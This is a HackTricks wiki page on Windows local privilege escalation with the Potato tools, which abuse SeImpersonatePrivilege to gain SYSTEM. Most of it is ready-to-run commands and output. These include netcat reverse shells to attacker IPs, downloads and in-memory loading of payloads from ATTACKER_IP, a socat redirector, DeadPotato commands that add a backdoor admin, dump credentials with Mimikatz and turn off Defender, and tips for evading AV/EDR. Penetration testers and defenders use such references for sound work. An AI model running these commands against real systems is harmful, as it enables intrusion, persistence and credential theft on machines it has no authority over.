roguepotato-and-printspoofer.md (13259B)
1 --- 2 title: "RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato 14 15 > [!WARNING] 16 > **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)[[5]](#references)[[6]](#references)[[7]](#references)</sup> 17 18 > [!TIP] 19 > A modern alternative frequently maintained in 2024–2025 is SigmaPotato (a fork of GodPotato) which adds in-memory/.NET reflection usage and extended OS support. See quick usage below and the repo in References. 20 21 Related pages for background and manual techniques: 22 23 [Seimpersonate From High To System](/hacktricks/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system) 24 25 [From High Integrity To System With Name Pipes](/hacktricks/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes) 26 27 [Privilege Escalation Abusing Tokens](/hacktricks/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens) 28 29 ## Requirements and common gotchas 30 31 All the following techniques rely on abusing an impersonation-capable privileged service from a context holding either of these privileges: 32 33 - SeImpersonatePrivilege (most common) or SeAssignPrimaryTokenPrivilege 34 - High integrity is not required if the token already has SeImpersonatePrivilege (typical for many service accounts such as IIS AppPool, MSSQL, etc.) 35 36 Check privileges quickly: 37 38 ```batch 39 whoami /priv | findstr /i impersonate 40 ``` 41 42 Operational notes: 43 44 - If your shell runs under a restricted token lacking SeImpersonatePrivilege (common for Local Service/Network Service in some contexts), regain the account’s default privileges using FullPowers, then run a Potato. Example: `FullPowers.exe -c "cmd /c whoami /priv" -z`<sup>[[10]](#references)[[11]](#references)</sup> 45 - PrintSpoofer needs the Print Spooler service running and reachable over the local RPC endpoint (spoolss). In hardened environments where Spooler is disabled post-PrintNightmare, prefer RoguePotato/GodPotato/DCOMPotato/EfsPotato. 46 - RoguePotato requires an OXID resolver reachable on TCP/135. If egress is blocked, use a redirector/port-forwarder (see example below). Older builds needed the -f flag. 47 - EfsPotato/SharpEfsPotato abuse MS-EFSR; if one pipe is blocked, try alternative pipes (lsarpc, efsrpc, samr, lsass, netlogon). 48 - Error 0x6d3 during RpcBindingSetAuthInfo typically indicates an unknown/unsupported RPC authentication service; try a different pipe/transport or ensure the target service is running. 49 - “Kitchen-sink” forks such as DeadPotato bundle extra payload modules (Mimikatz/SharpHound/Defender off) which touch disk; expect higher EDR detection compared to the slim originals. 50 51 ## Quick Demo 52 53 ### PrintSpoofer 54 55 ```bash 56 c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" 57 58 -------------------------------------------------------------------------------- 59 60 [+] Found privilege: SeImpersonatePrivilege 61 62 [+] Named pipe listening... 63 64 [+] CreateProcessAsUser() OK 65 66 NULL 67 68 ``` 69 70 Notes: 71 - You can use -i to spawn an interactive process in the current console, or -c to run a one-liner. 72 - Requires Spooler service. If disabled, this will fail. 73 74 ### RoguePotato 75 76 ```bash 77 c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999 78 # In some old versions you need to use the "-f" param 79 c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999 80 ``` 81 82 If outbound 135 is blocked, pivot the OXID resolver via socat on your redirector:<sup>[[9]](#references)</sup> 83 84 ```bash 85 # On attacker redirector (must listen on TCP/135 and forward to victim:9999) 86 socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999 87 88 # On victim, run RoguePotato with local resolver on 9999 and -r pointing to the redirector IP 89 RoguePotato.exe -r REDIRECTOR_IP -e "cmd.exe /c whoami" -l 9999 90 ``` 91 92 ### PrintNotifyPotato 93 94 PrintNotifyPotato is a newer COM abuse primitive released in late 2022 that targets the **PrintNotify** service instead of Spooler/BITS. The binary instantiates the PrintNotify COM server, swaps in a fake `IUnknown`, then triggers a privileged callback through `CreatePointerMoniker`. When the PrintNotify service (running as **SYSTEM**) connects back, the process duplicates the returned token and spawns the supplied payload with full privileges.<sup>[[13]](#references)</sup> 95 96 Key operational notes: 97 98 * Works on Windows 10/11 and Windows Server 2012–2022 as long as the Print Workflow/PrintNotify service is installed (it is present even when the legacy Spooler is disabled post-PrintNightmare). 99 * Requires the calling context to hold **SeImpersonatePrivilege** (typical for IIS APPPOOL, MSSQL, and scheduled-task service accounts). 100 * Accepts either a direct command or an interactive mode so you can stay inside the original console. Example: 101 102 ```cmd 103 PrintNotifyPotato.exe cmd /c "powershell -ep bypass -File C:\ProgramData\stage.ps1" 104 PrintNotifyPotato.exe whoami 105 ``` 106 107 * Because it is purely COM-based, no named-pipe listeners or external redirectors are required, making it a drop-in replacement on hosts where Defender blocks RoguePotato’s RPC binding. 108 109 Operators such as Ink Dragon fire PrintNotifyPotato immediately after gaining ViewState RCE on SharePoint to pivot from the `w3wp.exe` worker to SYSTEM before installing ShadowPad.<sup>[[14]](#references)</sup> 110 111 ### SharpEfsPotato 112 113 ```bash 114 > SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log" 115 SharpEfsPotato by @bugch3ck 116 Local privilege escalation from SeImpersonatePrivilege using EfsRpc. 117 118 Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0. 119 120 [+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2 121 df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc: 122 [x]RpcBindingSetAuthInfo failed with status 0x6d3 123 [+] Server connected to our evil RPC pipe 124 [+] Duplicated impersonation token ready for process creation 125 [+] Intercepted and authenticated successfully, launching program 126 [+] Process created, enjoy! 127 128 C:\temp>type C:\temp\w.log 129 nt authority\system 130 ``` 131 132 ### EfsPotato 133 134 ```bash 135 > EfsPotato.exe "whoami" 136 Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability). 137 Part of GMH's fuck Tools, Code By zcgonvh. 138 CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net] 139 140 [+] Current user: NT Service\MSSQLSERVER 141 [+] Pipe: \pipe\lsarpc 142 [!] binding ok (handle=aeee30) 143 [+] Get Token: 888 144 [!] process with pid: 3696 created. 145 ============================== 146 [x] EfsRpcEncryptFileSrv failed: 1818 147 148 nt authority\system 149 ``` 150 151 Tip: If one pipe fails or EDR blocks it, try the other supported pipes: 152 153 ```text 154 EfsPotato <cmd> [pipe] 155 pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc) 156 ``` 157 158 ### GodPotato 159 160 ```bash 161 > GodPotato -cmd "cmd /c whoami" 162 # You can achieve a reverse shell like this. 163 > GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012" 164 ``` 165 166 Notes: 167 - Works across Windows 8/8.1–11 and Server 2012–2022 when SeImpersonatePrivilege is present. 168 - Grab the binary that matches the installed runtime (e.g., `GodPotato-NET4.exe` on modern Server 2022). 169 - If your initial execution primitive is a webshell/UI with short timeouts, stage the payload as a script and ask GodPotato to run it instead of a long inline command.<sup>[[12]](#references)</sup> 170 171 Quick staging pattern from a writable IIS webroot: 172 173 ```powershell 174 iwr http://ATTACKER_IP/GodPotato-NET4.exe -OutFile gp.exe 175 iwr http://ATTACKER_IP/shell.ps1 -OutFile shell.ps1 # contains your revshell 176 ./gp.exe -cmd "powershell -ep bypass C:\inetpub\wwwroot\shell.ps1" 177 ``` 178 179 ### DCOMPotato 180 181  182 183 DCOMPotato provides two variants targeting service DCOM objects that default to RPC_C_IMP_LEVEL_IMPERSONATE. Build or use the provided binaries and run your command: 184 185 ```batch 186 # PrinterNotify variant 187 PrinterNotifyPotato.exe "cmd /c whoami" 188 189 # McpManagementService variant (Server 2022 also) 190 McpManagementPotato.exe "cmd /c whoami" 191 ``` 192 193 ### SigmaPotato (updated GodPotato fork) 194 195 SigmaPotato adds modern niceties like in-memory execution via .NET reflection and a PowerShell reverse shell helper.<sup>[[8]](#references)</sup> 196 197 ```powershell 198 # Load and execute from memory (no disk touch) 199 [System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://ATTACKER_IP/SigmaPotato.exe")) 200 [SigmaPotato]::Main("cmd /c whoami") 201 202 # Or ask it to spawn a PS reverse shell 203 [SigmaPotato]::Main(@("--revshell","ATTACKER_IP","4444")) 204 ``` 205 206 Additional perks in 2024–2025 builds (v1.2.x): 207 - Built-in reverse shell flag `--revshell` and removal of the 1024-char PowerShell limit so you can fire long AMSI-bypassing payloads in one go. 208 - Reflection-friendly syntax (`[SigmaPotato]::Main()`), plus a rudimentary AV evasion trick via `VirtualAllocExNuma()` to throw off simple heuristics. 209 - Separate `SigmaPotatoCore.exe` compiled against .NET 2.0 for PowerShell Core environments. 210 211 ### DeadPotato (2024 GodPotato rework with modules) 212 213 DeadPotato keeps the GodPotato OXID/DCOM impersonation chain but bakes in post-exploitation helpers so operators can immediately take SYSTEM and perform persistence/collection without additional tooling.<sup>[[15]](#references)</sup> 214 215 Common modules (all require SeImpersonatePrivilege): 216 217 - `-cmd "<cmd>"` — spawn arbitrary command as SYSTEM. 218 - `-rev <ip:port>` — quick reverse shell. 219 - `-newadmin user:pass` — create a local admin for persistence. 220 - `-mimi sam|lsa|all` — drop and run Mimikatz to dump credentials (touches disk, noisy). 221 - `-sharphound` — run SharpHound collection as SYSTEM. 222 - `-defender off` — flip Defender real-time protection (very noisy). 223 224 Example one-liners: 225 226 ```batch 227 # Blind reverse shell 228 DeadPotato.exe -rev 10.10.14.7:4444 229 230 # Drop an admin for later login 231 DeadPotato.exe -newadmin pwned:P@ssw0rd! 232 233 # Run SharpHound immediately after priv-esc 234 DeadPotato.exe -sharphound 235 ``` 236 237 Because it ships extra binaries, expect higher AV/EDR flags; use the slimmer GodPotato/SigmaPotato when stealth matters. 238 239 ## References 240 241 - [1] [PrintSpoofer – Abusing Impersonation Privileges on Windows 10 and Server 2019](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) 242 - [2] [itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer) 243 - [3] [antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato) 244 - [4] [bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato) 245 - [5] [BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato) 246 - [6] [zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato) 247 - [7] [zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato) 248 - [8] [tylerdotrar/SigmaPotato](https://github.com/tylerdotrar/SigmaPotato) 249 - [9] [No more JuicyPotato? Old story, welcome RoguePotato](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/) 250 - [10] [FullPowers – Restore default token privileges for service accounts](https://github.com/itm4n/FullPowers) 251 - [11] [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html) 252 - [12] [HTB: Job — LibreOffice macro → IIS webshell → GodPotato to SYSTEM](https://0xdf.gitlab.io/2026/01/26/htb-job.html) 253 - [13] [BeichenDream/PrintNotifyPotato](https://github.com/BeichenDream/PrintNotifyPotato) 254 - [14] [Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation](https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/) 255 - [15] [DeadPotato – GodPotato rework with built-in post-ex modules](https://github.com/lypd0/DeadPotato)